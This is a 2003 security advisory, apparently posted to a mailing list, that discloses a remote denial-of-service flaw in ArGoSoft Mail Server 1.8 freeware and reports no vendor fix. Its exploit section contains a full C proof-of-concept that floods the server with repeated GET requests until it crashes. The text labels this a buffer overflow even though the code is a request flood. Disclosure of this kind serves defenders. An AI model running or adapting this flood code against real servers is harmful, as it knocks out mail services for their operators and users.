Denial of Service Attack against ArGoSoft Mail Server Version 1.8

["Rushjo () tripbit org" <rushjo () tripbit org>]

TA-2003-06 Denial of Service Attack against ArGoSoft Mail Server Version 
1.8 (1.8.3.5)
contributed by: rushjo
====================================================================================== 

Tripbit Security Advisory

TA-2003-06 Denial of Service Attack against ArGoSoft Mail Server Version 
1.8 (1.8.3.5)
====================================================================================== 



PROGRAM: ArGoSoft Mail Server  
HOMEPAGE: http://www.argosoft.com
VULNERABLE VERSIONS: 1.8 (1.8.3.5)
NOT VULNERABLE VERSIONS: 1.8 Plus and 1.8 Prof   
RISK: Medium
IMPACT: Denial of Service Attack  
RELEASE DATE: 2003-06


====================================================================================== 

TABLE OF CONTENTS
====================================================================================== 



1..........................................................DESCRIPTION
2..............................................................DETAILS
3..............................................................EXPLOIT
4............................................................SOLUTIONS
5........................................................VENDOR STATUS
6..............................................................CREDITS
7...........................................................DISCLAIMER
8...........................................................REFERENCES
9.............................................................FEEDBACK


1. DESCRIPTION
====================================================================================== 



"ArGoSoft Mail Server is fully functional SMTP/POP3/Finger server for 
Windows
95/98/Me/2k/XP, which will let you turn your computer into the email 
system.
It's very compact, takes only about 1Mb of disk space, does not have any 
specific
memory requirements, and what is the most important - it's very easy to use.

Currently we have three different versions of server: freeware, Plus and 
Pro."
(This description is taken from the website of ArGo Software Design)


2. DETAILS
====================================================================================== 



¤ Remote DoS :


A security vulnerability in ArGoSoft Mail Server "Freeware" allows remote
attackers to crash the server by executing too much "get Request.


The command can be issued to the Mail server by everyone. The attacker 
need no
authentification.



3. EXPLOIT
====================================================================================== 



This is an Proof of Concept Exploit of this Buffer Overflow Vul-
nerability.


NOTE: This is only for INFORMATION purposes and not for any
     destructive acts!


/**********************************************************************************
*
*     Denial of Service Attack against ArGoSoft Mail Server Version 1.8 
(1.8.3.5)
*    
*    Tripbit Security Development
*    ---------------------------------
*
*    Author: posidron
*
*    Contact
*    [-] Mail: posidron () tripbit org
*    [-] Web: http://www.tripbit.org
*    [-] Forum: http://www.tripbit.org/wbboard
*    [-] IRC: irc.euirc.net 6667 #tripbit
*
*    Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe, PeaceTreaty
*
**********************************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
   int port, sockfd;
   struct sockaddr_in server;
   struct hostent *host;
   char sendstring[1024];
   
   strcpy(sendstring, "GET  /index.html HTTP/1.0\n\n");
   
   if(argc < 3)
   {
       printf("Usage: %s [target] <port>\n", argv[0]);
       exit(0);
   }
   
   port = atoi(argv[2]);
   
   host = gethostbyname(argv[1]);
   if(host == NULL)
   {
       printf("Connection failed!...\n");
       exit(0);
   }
   
   server.sin_family = AF_INET;
   server.sin_port = htons(port);
   server.sin_addr.s_addr = inet_addr((char*)argv[1]);
   
   printf("Dos against ArGoSoft Mail Server Version 1.8 (1.8.3.5)\n");
   
   for(;;)
   {
       if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
       {
           printf("socket() failed!\n");
           exit(0);
       }

       if(connect(sockfd, (struct sockaddr*)&server, sizeof(server)) < 0)
       {
           printf("connect() failed!\n");
           close(sockfd);
       }
       
       if (write(sockfd, sendstring, strlen(sendstring)) < 0)
       {
           break;
       }
       
       close(sockfd);
   }

   printf("Attack done!...\n");
}



This error will produce an "crash" of the ArGoSoft Mail Server.



4. SOLUTIONS
================================================================================ 



No solution for the moment.



5. VENDOR STATUS
================================================================================ 



The vendor has reportedly been notified but no answer of to this report.



6. CREDITS
================================================================================ 



Discovered by posidron



7. DISLAIMER
======================================================================


The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.



8. REFERENCES
======================================================================


- Original Version:
http://www.tripbit.org


9. FEEDBACK
======================================================================


Please send suggestions, updates, and comments to:


Tripbit Security Advisory
http://www.tripbit.org
rushjo () tripbit org
posidron () tripbit org